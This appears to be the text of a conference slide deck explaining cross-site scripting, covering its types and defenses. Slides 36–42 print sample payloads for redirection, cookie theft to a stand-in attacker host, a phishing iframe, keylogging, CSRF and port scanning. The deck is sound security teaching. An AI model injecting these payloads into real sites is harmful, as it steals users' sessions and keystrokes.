Cross-site scripting (XSS) is an injection attack where malicious scripts are injected into otherwise trusted sites. There are three main types of XSS attacks: reflected XSS occurs via URLs, stored XSS occurs when scripts are stored in a database and delivered to users, and DOM-based XSS modifies the DOM environment. XSS attacks can lead to issues like session hijacking, phishing, and port scanning. Developers can prevent XSS by validating and encoding untrusted data, and using HTTP-only and secure flags for cookies.

1. `
XSS Multi
Facet
Vulnerability

2. #whoami
Mohammed Imran ( @imran_naseem )
Information Security professional @ TCS
Null Hyderabad Chapter Lead
OWASP Hyderabad Board Member

3. Agenda
1
3
2
1 4Cross Site Scripting
Problem
Anatomy of XSS
Types of XSS
5 XSS Attacks
6 Solution

4. `
#1
The definitionof XSS

5. Cross site Scripting (XSS) attacks are a type of
injection problem, in which malicious scripts are
injected into otherwise benign and trusted web
sites.
“
”
Source:owasp.org

6. `
#2
The Problemof XSS

8. And its Expected ...

9. If not done securely, could
lead to problems

10. Such as...
Malicious Script Execution
Phishing
Redirection to malicious site
Session Hijacking
CSRF
Keylogging
Port Scanning

11. `
#3
The Anatomy
of XSS

13. Application takes insecure
content

15. HTML Source Code

16. `
#4
The Typesof XSS

17. Reflected XSS

18. Reflected attack generally is used to exploit script
injection vulnerabilities via URL in a web application.“
”

25. Stored XSS

26. Stored XSS occurs when the injected script is stored
in the database and is delivered to the visitor of the
application.
“
”

33. DOM XSS

34. DOM Based XSS is an XSS attack wherein the attack
payload is executed as a result of modifying the
DOM “environment” in the victim’s browser used by
the original client side script, so that the client side
code runs in an “unexpected” manner.
“
”
Source:owasp.org

35. `
#5
The AttackTypes in XSS

36. Redirection
“><script>document.location.href=”
http://www.MaliciousSite.com/” </script>

37. Session Hijacking
“><script>document.location.href=”
http://www.MaliciousSite.com/cookiestealer.php?
cookie=”+document.cookie </script>

38. Phishing
“><iframe src="http://www.yourphishingsite.com"
height="100%" width="100%"></iframe>

39. keylogging
“><script src=”http://www.MaliciousSite.com/
keylogger.js”> </script>
Logic:
document.onkeypress = function keyLog(a) { new
Image().src='http://www.attacker.com/logging.php?
data='+a.which; }

40. REDIRECTION
“><script>document.location.href=”
http://www.MaliciousSite.com/” </script>

41. CSRF
Page 1:
<form name=”delete” action="http://yoursite.com/deleteuser"
method="post">
<input type="hidden" name="userid" value="1">
<input type=”submit”>
</form>
Page 2:
“><script>document.form.delete.submit();</script>

42. Port Scanning
<script type="text/javascript">
function handleError(message, url, line){
if(message.match(/Script error|Error loading script/)){
alert("open");
}
}
var newScript = document.createElement('script');
newScript.src = 'http://www.google.com:80/';
document.body.appendChild(newScript);
window.onerror = handleError;
</script>

43. `
#6
The Solutionto fix XSS

44. Solution
● Validate the data ( use white-listing )
● Encode the data
● Use HTTP-only and secure flags for cookies

45. Credits
● http://www.symantec.com/connect/blogs/getting-sassy
● All icons are from http://thenounproject.com/
● Owasp.org